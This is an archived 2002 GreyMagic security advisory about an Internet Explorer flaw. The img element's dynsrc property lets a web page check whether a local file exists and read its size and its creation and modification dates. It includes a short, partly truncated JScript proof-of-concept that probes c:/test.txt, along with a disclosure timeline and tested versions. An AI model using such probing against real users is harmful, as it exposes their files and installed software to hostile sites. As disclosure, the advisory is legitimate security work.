Retrieving information on local files in IE (GM#003-IE)

From: GreyMagic Software (security@GREYMAGIC.COM)
Date: 03/27/02

Date:         Wed, 27 Mar 2002 02:21:56 +0200
From: GreyMagic Software <security@GREYMAGIC.COM>

GreyMagic Security Advisory GM#003-IE

By GreyMagic Software, Israel.
27 Mar 2002.

Available in HTML format at

Topic: Retrieving information on local files in IE.

Discovery date: 18 Feb 2002.

Affected applications:

All tested versions of Microsoft Internet Explorer (IE5+); prior versions
may be vulnerable as well.


The <img> element is commonly used to present images on an HTML document.
However, it also contains a feature that allows it to present other types of
media, such as VRML, AVI, MPEG, etc.

This feature was implemented in the form of a property named dynsrc.


The problem lies within the dynsrc property's implementation, which
completely ignores the source validity and gives script access to the
assigned file even if it is not presentable.

Once a file name has been assigned to the dynsrc property it is possible to
see whether it exists by checking the fileSize property of the <img>
element, if the return value is -1 then it is certain that the file does not
exist, any greater value indicates that the file exists.

When a file has been known to exist it is possible to extract additional
information from the <img> element.

Such as:

* The file size in bytes, using the fileSize property.
* The date the file was created, using the fileCreatedDate property.
* The date the file was last modified, using the fileModifiedDate property.
* The date the file was last updated, using the fileUpdatedDate property.

A malicious attacker may use this bug in conjunction with other bugs to
detect files or determine whether the user has specific programs (and even
specific versions, according to size) installed, etc.


This simple example demonstrates how the bug is used to check whether
"c:/test.txt" exists and retrieves its additional properties if it does.

<img dynsrc="file://c:/test.txt" id="oFile">
<script language="jscript" defer>
        function () {
                        oFile.fileSize>-1 ?
                                "File exists!\n\n"+
                                "Size: "+oFile.fileSize+" bytes.\n"+
                                "Created: "+oFile.fileCreatedDate+".\n"+
                                "Modified: "+oFile.fileModifiedDate+".\n"+
                                "Updated: "+oFile.fileUpdatedDate+"."
                                "File does not exist."


Microsoft was first informed on 18 Feb 2002 (38 days ago), they have opened
an investigation regarding this issue and will probably release a patch in
the near future.

Until a patch becomes available the only workaround is to disable Active

Tested on:

IE5sp2 NT4 sp6a, all possible patches.
IE5.5sp2 Win98, all patches.
IE5.5sp2 NT4 sp6a, all patches.
IE6sp1 Win2000 sp2, all patches.


A fully dynamic proof-of-concept demonstration of this issue is available at


Please mail any questions or comments to

- Copyright 2002 GreyMagic Software.

Relevant Pages

  • Retrieving information on local files in IE (GM#003-IE)
    ... By GreyMagic Software, Israel. ... Available in HTML format at ... Retrieving information on local files in IE. ... IE5sp2 NT4 sp6a, all possible patches. ...
  • Re: This is [Re:] How to improve the quality of the kernel[?].
    ... The problem are more social problems like patches Andrew has never heard ... The accepted industry standard for bug counts is basically one bug per a ... We cannot get a regression free or even bug free kernel. ... able to handle all incoming bug reports is IMHO a worthwhile and not ...
  • Re: [v4l-dvb-maintainer] [GIT PATCHES] V4L/DVB updates
    ... I have tested these patches with: ... Leadtek WinFast DTV dongle 1st generation ... Fix 3/3 for bug 7819: ...
  • Re: [Full-Disclosure] Re: January 15 is Personal Firewall Day,help the cause
    ... > every critical bug is fixed you should find out as much as possible ... using existing patches and NOT using software with known ... Instead they are promoting personal firewalls now in ... through MD5 checksum vetting before install. ...
  • Re: How to improve the quality of the kernel?
    ... >>> 20 other patches in the tree depending on it causing a regression, ... a big infrastructure patch exposing a latent old bug in some ... I think that we can handle bug reports like we handle modifications of code. ... these people can choose to use the bugzilla or any ...